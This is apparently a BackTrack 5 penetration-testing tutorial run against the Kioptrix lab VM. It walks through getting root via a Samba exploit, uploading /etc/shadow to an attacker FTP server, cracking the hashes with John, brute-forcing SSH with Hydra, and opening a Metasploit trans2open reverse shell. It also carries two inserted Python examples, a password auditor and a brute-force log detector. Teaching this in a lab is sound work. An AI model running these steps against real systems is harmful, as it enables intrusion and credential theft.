Understanding the True Security Posture of the Network Environment being Tested

(For more resources on Open Source, see here.)

Getting files to and from victim machines

Getting root on a remote machine can be interesting and is definitely a major step in the right direction (and depending on your scope and the purpose of the test, could be the only step necessary). If your task is not complete, then you will need to find methods of transferring data to and from your victim machines. There are several tools that will assist in this task; here are a few that may make your life easier in the long run.

Installing and starting a TFTP server on BackTrack 5

TFTP can be very handy at times. Many systems will already have a TFTP client installed and using this protocol is quick and easy.

# apt-get install atftpd

Be sure that your BackTrack machine is Internet enabled during the installation. To familiarize yourself with the atftpd server type atftpd at the command prompt without any additional input.

Starting TFTP as a standalone daemon pointing to /tmp on the standard port and bound to IP address can be accomplished by typing:

# atftpd --daemon --port 69 --bind-address /tmp

You can check to see if the daemon started correctly by invoking netstat and grepping for 69.

# netstat -anu |grep 69

If everything started correctly you should see something similar to:

udp        0      0*

Installing and configuring pure-ftpd

If your version of BackTrack does not have pure-ftpd installed, it may be added with the apt-get install pure-ftpd command. For full functionality of pure-ftpd you will need to add users and perform other minor configuration changes prior to use.

# echo /etc/pure-ftpd/pureftpd.pdb > /etc/pure-ftpd/conf/PureDB

Writes the path of the user database, /etc/pure-ftpd/pureftpd.pdb, into the PureDB configuration file (the file the next command links to).

# ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/50pure

Creates a symbolic link to the 50pure file, which enables the PureDB authentication backend.

# groupadd -g 7777 ftpz

Adds a group to the BackTrack guest machine.

# useradd -u 7777 -s /bin/false -d /dev/null -c "pureFTP" -g ftpz Testerz

Adds the system account that the virtual FTP users will be mapped to; it has no login shell and no home directory.

# mkdir /var/ftp /var/ftp/public /var/ftp/public/ftplogin

Creates the folders that will be used.

# chown -R Testerz:ftpz /var/ftp/public/ftplogin

Modifies the ownership so that the FTP account can write to its directory.

# pure-pw useradd ftplogin -u Testerz -d /var/ftp/public/ftplogin
Password: password
Enter it again: password

Sets up a virtual account that can be used with FTP connections.

# pure-pw mkdb

Builds the PureDB database (pureftpd.pdb) from the text password file so that the new account is usable.

# pure-pw show ftplogin

Performs a quick lookup in the Pure-FTP database to let us know the user settings.

Login              : ftplogin
Password           : $1$/NF5jAg0$I0oRJKViA5NYs455Afelr1
UID                : 7777 (Testerz)
GID                : 7777 (ftpz)
Directory          : /var/ftp/public/./
Full name          :
Download bandwidth : 0 Kb (unlimited)
Upload   bandwidth : 0 Kb (unlimited)
Max files          : 0 (unlimited)
Max size           : 0 Mb (unlimited)
Allowed local  IPs :
Denied  local  IPs :
Allowed client IPs :
Denied  client IPs :
Time restrictions  : 0000-0000 (unlimited)
Max sim sessions   : 0 (unlimited)

Starting pure-ftpd

The following command will start pure-ftpd:

# /etc/init.d/pure-ftpd start

You will be presented with the following output:

Starting ftp server: Running: /usr/sbin/pure-ftpd -l pam -8 UTF-8 -E  -u 1000 -O clf:/var/log/pure-ftpd/transfer.log -B

This server can be tested by connecting to localhost:

# ftp

The output should be similar to the following:

Connected to
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 17:02. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name ( ftplogin
331 User ftplogin OK. Password required
Password:
230-User ftplogin has group access to:  7777
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Production versus a controlled test lab environment: Consider setting up a dedicated user account and appropriate security measures on your production BackTrack instance. Make certain that FTP accounts have the permissions necessary to write files; otherwise, expect to receive errors when attempting uploads from victim machines.

Passwords: Something you know…

In this day and age one would assume that all systems use multifactor authentication. Unfortunately that is not the case. Even so-called "secured networks" still use protocols that send passwords in clear text, systems that use insecure encryption protocols, and more. One basic skill (basic as in chess: easy to learn, difficult to master) that every pentester should attempt to master is the art of password cracking. We will start off with a few simple examples to solidify the concept and then move on to some of the strategies used by the very best in the field.

Cracking the hash

Passwords are often reused by busy users and even administrators. Regardless of how important a system is on the network, once you gain access to the password hashes they should immediately be cracked and added to any dictionary file you have in place. This could potentially save a lot of time.

First we need to pull some files from the victim machine. Start up your BackTrack Tester 1 and Kioptrix Level 1 guest machines, run the exploit you previously compiled, and pull the shadow file down so that we can run John against it.

  1. Start all necessary virtual devices in your lab (BackTrack Tester 1, Kioptrix).
  2. Run ./SambaVuln_10 -b 0
  3. You are now connected as root on kioptrix.level1.
  4. Open a new terminal session and start pure-ftpd on your BackTrack guest machine.
  5. In the shell that is connected to the Kioptrix machine, use FTP to connect to your FTP server on the BackTrack machine:

    cd /etc

    Move to the /etc directory. Remember that you will not receive much feedback from the victim machine.

    You should see a directory listing of the Kioptrix /etc directory.

    Type in the user name we created on the FTP server on the BackTrack machine (ftplogin).

    Password: password

    Enter the password for the FTP server account. Wait a moment or two and type:

    put shadow

    Wait a few more moments and type:

    You should see a directory listing of the target FTP site.

  6. CTRL + Q will get you out of the Kioptrix machine.

You could have also simply performed a cat shadow and copied the screen output with your mouse. Knowing how to pull files from your target machines is very important however, especially if the files are very large.

Now that we have the shadow file on our BackTrack machine, let's see what we can do with it.

# cd /pentest/passwords/john

Once we browse to the proper directory we can launch john against our Kioptrix shadow file:

# john /var/public/shadow

John will begin brute-forcing the MD5 password hashes:

Loaded 3 password hashes with 3 different salts (FreeBSD MD5 [32/64 X2])

If you are lucky or extremely patient you will be rewarded with the plaintext passwords for the target machine. Depending on the password complexity in use, combined with the speed of your system, this step could take anywhere from minutes to weeks to complete. There are third-party services that can be used to crack passwords, but using them would have to be specifically permitted within your rules of engagement, as you lose control of any data sent to a third party.

Brute forcing passwords

Brute forcing is still a very viable method of gaining access to a machine. The problem with passwords is that people have to be able to recall them at will. Trying to remember 233!sdsfF_DaswsaWlsc!!&$#_ would be difficult for most and thus we end up with a short list of commonly used passwords such as ILoveKellie1!. The problem with this is that there are several methods of narrowing down the list of possible passwords, and that computers currently have as many as 8 processor cores for a home desktop.

Password cracking can be accomplished by using multiple video cards and their GPUs. This is the preferred method if the resources are available.

Although the password ILoveKellie1! would meet numerous enforced password policies, you could easily make a list of passwords that appends certain commonly used characters such as !, 1, 2, and so on. If you are clever about how you are creating your word lists, placing commonly used terms such as ILove, Iam, and so on would make the rest trivial. Modern password brute forcing techniques would tear this password up in mere moments. This makes cracking passwords faster and easier than ever. Here we will take a look at a few methods of brute forcing these passwords.

Please be aware that many of the examples used in this article are simplified to make the concepts easier to learn. Once you understand the concepts, you will be able to use the very same techniques when performing on real-life networks as well.
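To make the two preceding points concrete, here is an added example (not code from the article, from John the Ripper or from pure-ftpd) that implements the FreeBSD MD5 crypt scheme John reported when loading the Kioptrix shadow file and then audits shadow-style entries against a wordlist expanded with the prefix and suffix habits just described. The ftplogin hash is the one pure-pw printed earlier; the other user names, salts and hashes are constructed for the example.

```python
"""Audit shadow-style entries for weak passwords (added example, not from the article).

Implements the FreeBSD MD5 ("$1$") crypt scheme that John reports when it loads the
Kioptrix shadow file, then expands a short wordlist with the prefix/suffix habits the
text describes (ILove..., ...1!) so that a policy-compliant ILoveKellie1! is still caught.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def md5crypt(password: str, salt: str) -> str:
    """Return '$1$<salt>$<hash>' for password (FreeBSD MD5 crypt, 1000 rounds)."""
    pw, st = password.encode(), salt[:8].encode()
    ctx = hashlib.md5(pw + b"$1$" + st)
    alt = hashlib.md5(pw + st + pw).digest()
    for i in range(len(pw)):            # as many bytes of alt as the password is long
        ctx.update(alt[i % 16:i % 16 + 1])
    i = len(pw)
    while i:                            # bit-walk over the password length (original quirk)
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):               # stretching loop; the input order varies per round
        rnd = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            rnd.update(st)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()
    out = []                            # crypt's base64 variant over re-ordered digest bytes
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = (final[a] << 16) | (final[b] << 8) | final[c]
        for _ in range(4):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
    v = final[11]
    for _ in range(2):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return "$1$" + salt[:8] + "$" + "".join(out)


# Prefixes and suffixes the text singles out as common habits (constructed, small set).
PREFIXES = ("", "ILove", "Iam")
SUFFIXES = ("", "!", "1", "2", "1!")


def candidates(words):
    """Yield each base word wrapped in every prefix/suffix combination."""
    for word in words:
        for pre in PREFIXES:
            for suf in SUFFIXES:
                yield pre + word + suf


def audit_shadow(shadow_lines, words):
    """Return {user: recovered_password} for $1$ entries matched by a candidate."""
    cands = list(candidates(words))
    weak = {}
    for line in shadow_lines:
        user, field = line.split(":")[:2]
        if not field.startswith("$1$"):
            continue                    # locked ('!' or '*'), empty, or another scheme
        salt = field.split("$")[2]
        for cand in cands:
            if md5crypt(cand, salt) == field:
                weak[user] = cand
                break
    return weak


# Constructed shadow lines. The ftplogin hash is the one pure-pw printed earlier in
# the text for the password "password"; the other hashes are generated right here.
SAMPLE_SHADOW = [
    "ftplogin:$1$/NF5jAg0$I0oRJKViA5NYs455Afelr1:15294:0:99999:7:::",
    "harold:" + md5crypt("ILoveKellie1!", "Kq8x1z9v") + ":15294:0:99999:7:::",
    "strong:" + md5crypt("233!sdsfF_DaswsaWlsc!!&$#_", "aZ3kLp0Q") + ":15294:0:99999:7:::",
    "daemon:*:15294:0:99999:7:::",
]

if __name__ == "__main__":
    for user, pwd in audit_shadow(SAMPLE_SHADOW, ["password", "Kellie"]).items():
        print(f"weak password for {user}: {pwd!r}")
```

The "strong" entry is never matched because its password is not derivable from the wordlist by these rules, and the locked daemon entry is skipped before any hashing takes place.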

THC Hydra

THC Hydra makes the task of checking for weak passwords fun. It is released under the GPLv3 and is continually updated by the THC team. Updated information about this product can be found by browsing http://www.thc.org/thc-hydra/.

THC Hydra currently supports more than 40 services including FTP, MySQL, POP3, SSH2, VNC, and many more.

We will start our virtual lab and get started with using THC Hydra, which is included in BackTrack 5. Let's connect to the Kioptrix machine and create an account so that we can see how Hydra does at finding the password. On the BackTrack machine load up our previously used Samba exploit:

# ./SambaVuln_10 -b 0

Once connected, type the following to change the password for the Harold account:

passwd Harold
New password: lotsOfPasswords
Retype new password: lotsOfPasswords

As with many tools, the quickest method of determining the syntax is to invoke the program without any additional input:

# hydra

The command syntax will be displayed in the output:

Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]

Hydra can be used from the command prompt, but it also has a nice GUI that can be invoked using:

# xhydra

This command will launch the GUI and we are presented with the following:

We will be using the password files included with BackTrack, but ideally you will be downloading or creating your own password files, especially if you are able to pull company-specific information from your client's website or metadata. I highly recommend checking out cewl (written by DigiNinja and preinstalled on BackTrack) at http://www.digininja.org/projects/cewl.php.

In order to perform a simple brute forcing attack against our Kioptrix machine we must choose the following settings:

  • Target Tab
    • Single Target: (the Kioptrix virtual machine)
    • Port: 22
    • Protocol: SSH
    • Check the following options: Be Verbose, Show Attempts
  • Passwords Tab
    • Username: Harold
    • Password: lotsOfPasswords
    • Check: Try login as password, Try empty password
  • Everything else as default

Go to the Start tab and on the bottom of the screen click on the Start button. You will be presented with the following:

Well, we managed to guess the password for an account that we already know the password for… Not very exciting, but it does let you know there are easy methods of validating if an account login is accurate or not without having to log into whichever client is necessary (checking SNMP for instance, or TFTP).

Let's add our password to a dictionary that is included with BackTrack 5. Open up a terminal session and type:

# cd /pentest/passwords/wordlists

This takes you to the wordlists directory.

There is a file named darkc0de.lst in the wordlists directory that will get you started. Take a look at this file to get an idea of what a typical wordlist consists of.

This is a very convenient place to store all of your personal wordlists. Many testers will have several favorites, and also create wordlists on the fly as needed. Let's add our password to this listing. Edit darkc0de.lst to look something like this:

^[
^[^[
^[^[^[
^[^[^[^[
^[^[^[^[^[
^[^[^[^[^[^[
^[^[^[^[^[^[^[
^[^[^[^[^[^[^[^[
!magnus
!power
"A" SIDES
"DETROIT" GARY & CC TH WIGGINS
lotsOfPasswords
#
#

We have added the test password near the top of this file so that it will be found quickly.

Open up Xhydra again and select the following options:

  • Target Tab
    • Single Target: (the Kioptrix virtual machine)
    • Port: 22
    • Protocol: SSH
    • Check the following options: Be Verbose, Show Attempts
  • Passwords Tab
    • Username: Harold
    • Password List: Selected, Click the entry field to select /pentest/passwords/wordlists/darkc0de.lst
    • Check: Try login as password, Try empty password
  • Tuning
    • Number of Tasks: 1
    • Exit after first found pair: Checked
  • Everything else as default

Go to the Start tab again and click Start in the bottom right of the window:

THC Hydra is a definite benefit to anyone's toolkit, and its use should be practiced and perfected to be truly successful in penetrating complex networks where passwords may be the weakest link in the entire security architecture.
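From the defender's side, the Hydra run above leaves a recognizable trace in the target's sshd log: a burst of "Failed password" lines from one address, followed by "Accepted password" once the wordlist hits. The following added example (not code from the article or from Hydra) flags both patterns with a sliding window per source address; the host name, addresses and log lines are constructed.

```python
"""Flag SSH password-guessing bursts in sshd log lines (added example, not from the article).

A Hydra run against port 22 shows up on the target as many "Failed password" lines
from one source within seconds, optionally followed by "Accepted password" once the
wordlist hits. This detector keeps a sliding window of failures per source address.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches the standard sshd auth.log format; the year is not logged, so
# timestamps are only compared relative to one another.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return alert tuples (kind, source, user) in log order.

    'burst'                  - the source reached `threshold` failures within `window`
    'success_after_failures' - a login succeeded while failures were still in the window
    """
    failures = defaultdict(deque)       # src -> timestamps of recent failed attempts
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                    # not a password-auth line (or a different format)
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        recent = failures[m["src"]]
        while recent and ts - recent[0] > window:
            recent.popleft()            # expire attempts older than the window
        if m["outcome"] == "Failed":
            recent.append(ts)
            if len(recent) == threshold:    # alert once, when the threshold is crossed
                alerts.append(("burst", m["src"], m["user"]))
        elif recent:
            alerts.append(("success_after_failures", m["src"], m["user"]))
    return alerts


# Constructed auth.log excerpt: one address guesses Harold's password and
# eventually gets in; a second address has two stray failures only; the last
# login is well outside the window and must not be flagged.
SAMPLE_LOG = [
    "Nov 16 21:47:01 kioptrix sshd[1201]: Failed password for Harold from 192.168.56.101 port 40001 ssh2",
    "Nov 16 21:47:01 kioptrix sshd[1202]: Failed password for Harold from 192.168.56.101 port 40002 ssh2",
    "Nov 16 21:47:02 kioptrix sshd[1203]: Failed password for invalid user admin from 192.168.56.102 port 50001 ssh2",
    "Nov 16 21:47:02 kioptrix sshd[1204]: Failed password for Harold from 192.168.56.101 port 40003 ssh2",
    "Nov 16 21:47:02 kioptrix sshd[1205]: Failed password for Harold from 192.168.56.101 port 40004 ssh2",
    "Nov 16 21:47:03 kioptrix sshd[1206]: Failed password for Harold from 192.168.56.101 port 40005 ssh2",
    "Nov 16 21:47:03 kioptrix sshd[1207]: Failed password for invalid user admin from 192.168.56.102 port 50002 ssh2",
    "Nov 16 21:47:04 kioptrix sshd[1208]: Failed password for Harold from 192.168.56.101 port 40006 ssh2",
    "Nov 16 21:47:05 kioptrix sshd[1209]: Accepted password for Harold from 192.168.56.101 port 40007 ssh2",
    "Nov 16 22:30:00 kioptrix sshd[1300]: Accepted password for Harold from 192.168.56.101 port 40100 ssh2",
]

if __name__ == "__main__":
    for kind, src, user in detect_bruteforce(SAMPLE_LOG):
        print(f"{kind}: {src} -> {user}")
```

Hydra's "Number of Tasks" setting controls how many parallel connections it opens, so lowering the threshold or widening the window catches slower, more patient runs at the cost of more false positives from users who simply mistype.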

Metasploit — learn it and love it

The Metasploit™ framework is incredible. It offers penetration testers a wide variety of tools in a friendly, easy to use manner. It was originally created by HD Moore and has recently been purchased by Rapid7, the creators of the Nexpose vulnerability scanner toolkit. Everything that we have done manually can be done with Metasploit. If you are new to penetration testing, I highly recommend that you go through the free training provided at http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training to get a really good grasp of how powerful this framework really is. This site is constantly updated and should be visited frequently to find information about the latest additions to the MSF framework.

Updating the Metasploit framework

As always, it is very important that applications are updated frequently. Metasploit is no different in this regard. You should update your installation of the Metasploit framework at least once per week. The command is very easy to remember. You can run the command from a BackTrack shell regardless of your current working directory. Be sure that your BackTrack lab machine is connected to the Internet before you update.


Once the update has completed you should be presented with an update notice and then the command prompt:

Updated to revision <new revision number>
root@bt:~#

You will also see an informative section on the Metasploit title screen that reminds you of your last update:

# msfconsole

This command will yield output similar to the following:

[Metasploit ASCII art banner]

       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 762 exploits - 404 auxiliary - 117 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14271 updated today (2011.11.16)

msf >

Note that the date of the last update and the SVN revision number are presented as part of the output.

This may be a good time to update your BackTrack guest machine as well. You should update BackTrack before updating the Metasploit framework.

Databases and Metasploit

One of my favorite Metasploit features would be the ability to have all of your results dumped into a database. Metasploit uses PostgreSQL by default.

Installing PostgreSQL may not be required. Attempt to connect to the database within the MSF context, and if you experience errors follow the complete installation procedure and try again.

Installing PostgreSQL on BackTrack 5

We will need to reconnect our BackTrack 5 guest machine to the Internet again in order to download and install PostgreSQL. Once you have verified your connectivity, type the following:

# apt-get install postgresql

Read the instructions and press Y to continue. The installation should finish with a statement similar to the following:

Setting up postgresql (8.4.8-0ubuntu0.10.04) ...

Now we need to make some modifications to the installation:

# sudo su postgres -c psql
could not change directory to "/root"
psql (8.4.8)
Type "help" for help.

With postgres installed we are presented with the following prompt to let us know we are working within the database console:


We will now change the password for the default database user:

postgres=# ALTER USER postgres WITH PASSWORD 'myPassword';
ALTER ROLE

Here we changed the password for the postgres role. We will use \q to exit the postgres console.

postgres=# \q

Verifying database connectivity

Load up the Metasploit console:

# msfconsole

At the msf > prompt type:

msf > db_connect postgres:myPassword@
msf > db_status
[*] postgresql connected to pentester

Now we know that we are connected to the PostgreSQL database named pentester. We can verify connectivity by typing:

msf > hosts

Hosts
=====

address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------

The previous command will provide us with a listing of hosts. As you can see there is nothing interesting just yet.

Performing an Nmap scan from within Metasploit

We need something exciting to display when running the hosts command so let's run a quick nmap scan to collect some data. With msfconsole open and the database connected, we can now run our nmap scans directly from within Metasploit.

msf> db_nmap -nO -sTU -pT:22,80,111,139,443,32768,U:111,137,32768

The results look very familiar with the added bonus of having been added to the database for future reference:

[*] Nmap: Starting Nmap 5.51SVN (http://nmap.org) at 2011-11-16 21:47 EST
[*] Nmap: Nmap scan report for
[*] Nmap: Host is up (0.00059s latency).
[*] Nmap: PORT      STATE         SERVICE
[*] Nmap: 22/tcp    open          ssh
[*] Nmap: 80/tcp    open          http
[*] Nmap: 111/tcp   open          rpcbind
[*] Nmap: 139/tcp   open          netbios-ssn
[*] Nmap: 443/tcp   open          https
[*] Nmap: 32768/tcp open          filenet-tms
[*] Nmap: 111/udp   open          rpcbind
[*] Nmap: 137/udp   open          netbios-ns
[*] Nmap: 32768/udp open|filtered omad
[*] Nmap: MAC Address: 08:00:27:21:21:62 (Cadmus Computer Systems)
[*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.4.X
[*] Nmap: OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/.
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.00 seconds

If we run a quick hosts command we will see that the system has been added to our PostgreSQL pentester database:

msf > hosts

Hosts
=====

address  mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---                ----  -------  ---------  -----  -------  ----  --------
         08:00:27:21:21:62        Linux    2.4.X             device

Now that the data is in the database there are all sorts of handy time saving tricks we can perform. For instance, if we would like to see which systems have port 443 open we can enter:

msf > services -p 443

This provides us with a nicely formatted output listing all systems with 443:

Services
========

host  port  proto  name   state  info
----  ----  -----  ----   -----  ----
      443   tcp    https  open

Using auxiliary modules

msf > use auxiliary/scanner/portscan/tcp

The use command instructs Metasploit to use the specified module.

msf  auxiliary(tcp) > show options

Every module has a specifc set of options that can be displayed via the show options command. This particular module has the following options that can be changed:

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   FILTER                        no        The filter string for capturing traffic
   INTERFACE                     no        The name of the interface
   PCAPFILE                      no        The name of the PCAP capture file to process
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   SNAPLEN      65535            yes       The number of bytes to capture
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

We need to change a few of these to suit our needs:

msf  auxiliary(tcp) > set RHOSTS

RHOSTS is our target range. We set it to

msf  auxiliary(tcp) > set PORTS 1-1024

To save time we restrict the scan to only the first 1024 ports using the set PORTS setting.

msf  auxiliary(tcp) > run

The run command will initiate the scan using our predetermined settings. In a few moments we will receive feedback from the console:

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The important item of note here is that all modules operate in the same manner. Once you understand the method of searching for exploits you will be able to reuse the same steps repeatedly.

Using Metasploit to exploit Kioptrix

The time has come to take a look at using Metasploit to perform an attack against our Kioptrix machine. Since we already understand how to compile and use proof of concept code that is made available on the Internet, we will quickly appreciate the time savings that Metasploit provides. We will begin by connecting to our database.

# msfconsole
msf > db_connect postgres:myPassword@

We should already have some information in our database. This can be verified:

msf > services

This command provides us with the following output:

Services
========

host  port   proto  name         state  info
----  ----   -----  ----         -----  ----
      22     tcp    ssh          open
      80     tcp    http         open
      111    udp    rpcbind      open
      111    tcp    rpcbind      open
      137    udp    netbios-ns   open
      139    tcp    netbios-ssn  open
      443    tcp    https        open
      32768  tcp    filenet-tms  open
      32768  udp    omad         open

When reviewing these ports we find our previously exploited samba port 139 is still open. Now it is time to see what we can do without having to reformat exploit code.

msf > search samba

This results in a table with the following columns:

  • Name: The name column is what you pass to the use command once you decide which exploit to try.
  • Disclosure: Disclosure date is the actual date that the exploit was made known to the community or the vendor, not when the proof of concept code was released.
  • Rank: Rank is very important since it indicates how reliable the exploit is known to be.
  • Description: Well… the description of the type of exploit this is.

We will be using the trans2open exploit. In msfconsole type:

msf > use exploit/linux/samba/trans2open

When more information regarding an exploit is needed we can use the info command to receive the following output:

msf  exploit(trans2open) > info

       Name: Samba trans2open Overflow (Linux x86)
     Module: exploit/linux/samba/trans2open
    Version: 12196
   Platform: Linux
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  hdm <hdm@metasploit.com>
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Samba 2.2.x - Bruteforce

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  139              yes       The target port

Payload information:
  Space: 1024
  Avoid: 1 characters

Description:
  This exploits the buffer overflow found in Samba versions 2.2.0 to
  2.2.8. This particular module is capable of exploiting the flaw on
  x86 Linux systems that do not have the noexec stack option set.
  NOTE: Some older versions of RedHat do not seem to be vulnerable
  since they apparently do not allow anonymous access to IPC.

References:



This information is available for all of the exploits in Metasploit. When time permits, taking the time to familiarize yourself with some of the most commonly used exploits would be very beneficial in the long term as you will be able to avoid trying exploits that do not work on production systems.

Now we need to set some of the options that are available:

msf > set RHOST

RHOST is the remote host and needs to be set to our Kioptrix machine's IP address.

msf > show payloads

The show payloads command provides a listing of all of the compatible payloads that can be used with this particular exploit. We will make use of reverse_tcp for this example. This payload type is small and usually effective although it does not have the full range of options available that meterpreter does.

> set payload linux/x86/shell/reverse_tcp

We will also have to set the LHOST and the LPORT.

> set LHOST

This is our localhost that the listener will be set up on.

> set LPORT 2222

This is the port that we would like to listen on.

Now that that is out of the way, we can move on to exploitation:

> exploit

If all goes as planned, you will receive the following confirmation:

msf  exploit(trans2open) > exploit

[*] Started reverse handler on
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Sending stage (36 bytes) to
[*] Command shell session 2 opened ( -> ) at 2011-11-16 23:22:06 -0500

To ensure that we have root, we will perform the following commands:

# mail
Mail version 8.1 6/6/93.  Type ? for help.
"/var/mail/root": 6 messages 6 unread
>U  1 root@kioptix.level1   Sat Sep 26 11:42  15/481   "About Level 2"
 U  2 root@kioptrix.level1  Thu Nov 10 19:34  19/534   "LogWatch for kioptrix"
 U  3 root@kioptrix.level1  Fri Nov 11 14:38  48/1235  "LogWatch for kioptrix"
 U  4 root@kioptrix.level1  Sun Nov 13 15:12  19/534   "LogWatch for kioptrix"
 U  5 root@kioptrix.level1  Mon Nov 14 18:23 244/12279 "LogWatch for kioptrix"
 U  6 root@kioptrix.level1  Wed Nov 16 15:19  19/534   "LogWatch for kioptrix"

We are looking at the messages for the root account and can see that Loneferret has left us a nice little message; type 1 to read it:

# 1
Message 1:
From root  Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

This last exercise should have made it clear that, compared to manually finding and compiling code, using Metasploit is a breeze. The best part about it is that you will be able to add your own modules and compiled code to the framework as well.


In this article we looked at password cracking and brute forcing with both John the Ripper and THC Hydra. Password cracking is not going to go away anytime soon and expertise of this subject can be very beneficial in the long term.

The article also covered the steps necessary to transfer files to and from an exploited machine; this included the setup and configuration of the FTP daemon that comes preinstalled with BackTrack 5.

Finally, we wrapped up the article with a look at Metasploit and how it can be used to simplify the task of penetration testing in many different ways. By performing hands-on exercises it quickly became clear that although manually finding and compiling exploit code can be beneficial, using Metasploit can significantly increase your overall productivity.